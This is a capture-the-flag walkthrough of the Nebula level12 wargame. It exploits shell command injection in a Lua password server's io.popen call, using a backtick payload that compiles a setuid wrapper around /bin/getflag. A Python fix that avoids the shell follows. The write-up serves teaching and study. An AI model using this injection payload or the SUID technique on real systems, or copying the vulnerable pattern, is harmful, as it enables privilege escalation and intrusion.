Nebula level12

About
There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.

local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local line, err = client:receive()
  if not err then
    print("trying " .. line) -- log from where ;\
    local h = hash(line)

    if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
      client:send("Better luck next time\n");
    else
      client:send("Congrats, your token is 413**CARRIER LOST**\n")
    end

  end

  client:close()
end

After an initial reading it becomes obvious that you need to execute commands via the hash() function, which concatenates the submitted password into a shell command line passed to io.popen().

It’s also quite obvious which commands to run and how.

So, in this level (as well as in the previous one) we will reuse the technique from an older challenge (namely level03).

First create the wrapper /tmp/pwn.c:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    system("/bin/getflag");
    return 0;
}

Next, telnet to the server and send the magic string:

level12@nebula:~$ telnet localhost 50001
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Password: `gcc /tmp/pwn.c -o /tmp/pwn && chmod +s /tmp/pwn`;#
Better luck next time
Connection closed by foreign host.

After that we have a SUID binary pwn under /tmp:

level12@nebula:~$ /tmp/pwn
You have successfully executed getflag on a target account
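
The fix for the hash() function above, as an added example that is not part of the original write-up or the level's code: a Python port (stock Lua has no SHA-1, so a Lua fix would need a third-party module) that produces the same digest without a shell ever parsing the input. The function names are assumptions made for this example.

```python
import hashlib
import hmac
import subprocess

# Digest the level's server compares against (copied from the listing above).
EXPECTED = "4754a4f4bd5787accd33de887b9250a0691dd198"


def hash_in_process(line: bytes) -> str:
    # `echo <line> | sha1sum` hashes the line plus the newline echo appends,
    # so append b"\n" to stay compatible with the stored digest (for input
    # that echo prints verbatim). No shell ever parses the bytes.
    return hashlib.sha1(line + b"\n").hexdigest()


def hash_via_argv(line: bytes) -> str:
    # If the external sha1sum must be kept: fixed argv list, shell=False
    # (the default), and the untrusted bytes go to stdin only.
    out = subprocess.run(["sha1sum"], input=line + b"\n",
                         stdout=subprocess.PIPE, check=True).stdout
    return out[:40].decode("ascii")


def handle_line(line: bytes) -> str:
    # Constant-time comparison; replies mirror the original server
    # (token text omitted).
    if hmac.compare_digest(hash_in_process(line), EXPECTED):
        return "Congrats\n"
    return "Better luck next time\n"


if __name__ == "__main__":
    # Constructed sample input containing shell metacharacters.
    sample = b"`id`;#"
    print(hash_in_process(sample), handle_line(sample), end="")
```

With either function, backticks, `;` and `#` in the submitted line are hashed as ordinary bytes instead of being interpreted.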

Roger-out.

